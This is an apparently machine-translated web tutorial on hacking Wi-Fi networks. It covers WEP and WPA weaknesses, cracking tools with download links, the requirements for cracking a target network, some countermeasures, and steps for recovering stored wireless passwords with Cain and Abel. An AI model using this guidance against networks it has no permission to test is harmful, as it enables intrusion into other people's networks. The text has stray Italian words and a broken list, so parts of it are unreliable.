Wireless networks are accessible to anyone within the transmission range of the router, in this article we will talk about how to hack a Wifi network. This makes them vulnerable to attack. Hotspots are available in public places such as airports, restaurants, parks, etc.
In this tutorial, we will introduce you to common techniques used to exploit weaknesses in wireless network security implementations. We will also look at some of the countermeasures you can put in place to protect yourself from such attacks.
- What is a wireless network?
- How to join a wireless network?
- WEP and WPA wireless network authentication
- How to hack wireless networks
- How to secure wireless networks
- Hacking activity: cracking the wireless password
A wireless network is a network that uses radio waves to connect computers and other devices. The implementation is done at layer 1 (physical layer) of the OSI model.
You will need a wireless network enabled device such as a laptop, tablet, smartphone, etc. You will also need to be within transmission range of a wireless network access point. Most devices (if the wireless network option is enabled) will provide a list of available networks. If the network is not password protected, just click Connect. If it is password protected, the password will be required to hack into a Wifi network.
Because the network is easily accessible to anyone with a wireless network-enabled device, most networks are password protected. Let's take a look at some of the more commonly used authentication techniques.
WEP stands for Wired Equivalent Privacy. It was developed for the IEEE 802.11 WLAN standards. Its goal was to provide privacy equivalent to that provided by wired networks. WEP works by encrypting data transmitted over the network to protect it from eavesdropping.
Open System Authentication (OSA): This method grants access to the required station authentication based on the configured access policy.
Shared Password Authentication (SKA): This method sends an encrypted request to the station requesting access. The station encrypts the challenge with its key, then responds. If encrypted verification matches the AP value, access is granted.
WEP has significant design flaws and vulnerabilities.
- Package integrity is checked using Cyclic Redundancy Check (CRC32). The CRC32 integrity check can be compromised by capturing at least two packets. The bits in the encrypted stream and the checksum can be changed by the attacker so that the packet is accepted by the authentication system. This leads to unauthorized access to the network.
- WEP uses the RC4 encryption algorithm to create stream ciphers. The stream encryption input consists of an initial value (IV) and a secret key. The length of the initial value (IV) is 24 bits while the secret key can be 40 or 104 bits long . The total length of the initial value and secret can be 64-bit or 128-bit. The lowest possible value of the secret key makes it easy to crack .
- Weak initial value combinations do not encrypt enough . This makes them vulnerable to attack.
- WEP is based on passwords; this makes it vulnerable to dictionary attacks .
- Key management is poorly implemented . Changing keys, especially on large networks, is challenging. WEP does not provide a centralized key management system.
- The initial values can be reused
WPA stands for Wi-Fi Protected Access. This is a security protocol developed by the Wi-Fi Alliance in response to weaknesses found in WEP. It is used to encrypt data over 802.11 WLANs. It uses initial values greater than 48 bits instead of the 24 bits used by WEP. Use temporal keys to encrypt packets.
- The collision avoidance implementation can be aborted
- It is vulnerable to denial of service attacks
- Pre-shared keys use passphrases. Weak passphrases are vulnerable to dictionary attacks.
Cracking is the process of exploiting security weaknesses in wireless networks and unauthorized access. WEP cracking refers to exploits on networks that use WEP to implement security controls. There are basically two types of cracks namely;
- Cracking passivo- This type of cracking has no effect on network traffic as long as WEP security is not breached. It is difficult to detect.
- Cracking attivo: This type of attack has a greater load effect on network traffic. It is easier to detect than passive cracking. It is more effective than passive cracking.
WEP cracking tools
- Aircrack: network sniffer and WEP cracker. It can be downloaded from http://www.aircrack-ng.org/
- WEPCrack: this is an open source program to crack WEP 802.11 Wifi network. It is an implementation of the FMS attack. http://wepcrack.sourceforge.net/
- Kismet- Can include both visible and hidden wireless network detectors, packet sniffers, and intrusion detection. https://www.kismetwireless.net/
- WebDecrypt: This tool uses active dictionary attacks to crack Wifi WEP passwords. It has its own key generator and implements packet filters. http://wepdecrypt.sourceforge.net/
WPA uses a 256 pre-shared key or passphrase for authentications. Short passphrases are vulnerable to dictionary attacks and other attacks that can be used to crack passwords. The following tools can be used to decrypt WPA keys.
- CowPatty: This tool is used to crack wifi networks with pre-shared passwords (PSK) using a brute force attack. http://wirelessdefence.org/Contents/coWPAttyMain.htm
- Cain & Abel- This tool can be used to decrypt files captured by other sniffing programs such as Wireshark. The capture files can contain WEP or WPA-PSK encoded frames. http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml
- Sniffing: involves interception of packets as they are transmitted over a network. The captured data can then be decoded using tools such as Cain & Abel.
- Attacco Man in the Middle (MITM): it involves intercepting a network and acquiring sensitive information.
- Denial of Service Attack: The primary purpose of this attack is to deny legitimate users network resources. FataJack can be used to perform this type of attack.
You can decrypt Wifi WEP / WPA passwords used to access a wireless network. This requires software and hardware resources and patience. The success of such attacks can also depend on how active and inactive the users of the target network are.
We will provide you with basic information that can help you get started. Backtrack is a Linux-based security operating system. It is developed on Ubuntu. Backtrack comes with a number of security tools. Backtrack can be used to gather information, assess vulnerabilities, and perform exploits, among other things.
Some of the popular tools that backtrack has includes;
Cracking secure Wifi networks requires the patience and resources mentioned above. At a minimum, you will need the following tools.
Un wireless network adapter with the ability to inject packets (hardware)
- Kali operating system. You can download it from here https://www.kali.org/downloads/
- Be within range of the target network. If users of the target network actively use it and connect to it, the chances of cracking it will be significantly better.
- Knowledge sufficient Linux-based operating systems and practical knowledge of Aircrack and its various scripts.
- Patience, finding secure Wifi passwords may take a while depending on a number of factors, some of which may be beyond your control. Factors beyond your control include users on the target network actively using it while sniffing data packets.
In minimizing attacks on the wireless network; an organization may adopt the following policies
- Changing the default passwords supplied with the hardware
- Enabling the authentication mechanism
- Access to the network can be restricted allowing only registered MAC addresses.
- The use of powerful WEP and WPA-PSK keys, a combination of symbols, numbers and characters reduces the chance of keys being hacked using the dictionary and brute force attacks.
- Il software firewall it can also help reduce unauthorized access.
In this practical scenario, we will use Cain and Abel to decrypt the wireless network passwords stored in Windows. We will also provide useful information that can be used to decrypt the WEP and WPA keys of wireless networks.
- Download Cain and Abel from the link provided above.
- Open Cain and Abel
- Make sure the Decoders tab is selected, then click Wireless Password from the navigation menu on the left hand side
- Click the button with a plus sign
- Assuming you are already connected to a secure wireless network, you will get results similar to those shown below
- The decoder will show the type of encryption, the SSID and the password that was used.
- The transmission waves of the wireless network can be seen by strangers, this presents many security risks.
- WEP stands for Wired Equivalent Privacy. It has security holes that make it easier to breach than other security implementations.
- WPA stands for Wi-Fi Protected Access. It is more secure than WEP
- Intrusion detection systems can help detect unauthorized access
- A good security policy can help protect a network.